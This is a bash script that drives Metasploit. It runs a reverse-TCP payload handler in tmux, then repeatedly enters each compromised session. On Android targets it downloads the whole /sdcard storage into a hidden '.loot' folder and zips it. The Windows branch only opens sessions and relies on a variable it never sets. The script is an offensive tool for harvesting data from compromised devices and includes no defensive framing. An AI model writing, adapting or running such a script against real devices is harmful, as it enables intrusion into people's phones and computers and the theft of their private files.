#!/bin/bash

command -v msfconsole > /dev/null 2>&1 || { echo >&2 "I require metasploit but it's not installed. Install it. Aborting."; exit 1; }
command -v tmux > /dev/null 2>&1 || { echo >&2 "I require tmux but it's not installed. Install it. Aborting."; exit 1; }
command -v zip > /dev/null 2>&1 || { echo >&2 "I require zip but it's not installed. Install it. Aborting."; exit 1; }

if [ $# -ne 3 ]; then
	echo "Usage: $0 <LHOST> <LPORT> <PAYLOAD>"
	echo "Example: $0 192.168.178.30 4444 android/meterpreter/reverse_tcp"
	exit 1
fi

LHOST=$1
LPORT=$2
PAYLOAD=$3

DIR=$(pwd)
LOOT_DIR=$(pwd)/.loot

[[ ! -d ${LOOT_DIR} ]] && mkdir -p ${LOOT_DIR}

tmux new-session -d -s msfpe "msfconsole -q -x 'use exploit/multi/handler; set payload ${PAYLOAD}; set LHOST ${LHOST}; set LPORT ${LPORT}; set EnableStageEncoding true; exploit -j -z'" && sleep 30

case ${PAYLOAD} in
*"android"*)
	while true; do
		cd ${LOOT_DIR}
		tmux send-keys -t msfpe:0 "spool sessions_android.txt" C-m
		tmux send-keys -t msfpe:0 "sessions -l" C-m
		tmux send-keys -t msfpe:0 "spool off" C-m
		for s in $(grep -oP '^\s*\d+' sessions_android.txt | awk '{$1=$1};1'); do
			RANDNAME=$(head /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 8)
			mkdir -p ${LOOT_DIR}/android-${RANDNAME}
			cd ${LOOT_DIR}/android-${RANDNAME}
			tmux send-keys -t msfpe:0 "sessions -i ${s}" C-m
			tmux send-keys -t msfpe:0 "cd /sdcard" C-m
			tmux send-keys -t msfpe:0 "download -a -c -l 0 * ${LOOT_DIR}/android-${RANDNAME}" C-m
			tmux send-keys -t msfpe:0 "background" C-m
		done
		rm ${LOOT_DIR}/sessions_android.txt
		zip -rm -9 ${LOOT_DIR}/android-${RANDNAME}.zip ${LOOT_DIR}/android-${RANDNAME}
	done
	;;
*"windows"*)
	while true; do
		cd ${LOOT_DIR}
		tmux send-keys -t msfpe:0 "spool sessions_windows.txt" C-m
		tmux send-keys -t msfpe:0 "sessions -l" C-m
		tmux send-keys -t msfpe:0 "spool off" C-m
		for s in $(grep -oP '^\s*\d+' sessions_windows.txt | awk '{$1=$1};1'); do
			mkdir -p ${LOOT_DIR}/windows-${RANDNAME}
			cd ${LOOT_DIR}/windows-${RANDNAME}
			tmux send-keys -t msfpe:0 "sessions -i ${s}" C-m
			tmux send-keys -t msfpe:0 "background" C-m
		done
		rm ${LOOT_DIR}/sessions_windows.txt
		zip -rm -9 ${LOOT_DIR}/windows-${RANDNAME}.zip ${LOOT_DIR}/windows-${RANDNAME}
	done
	;;
*)
	echo "Platform not supported."
	exit 1
esac
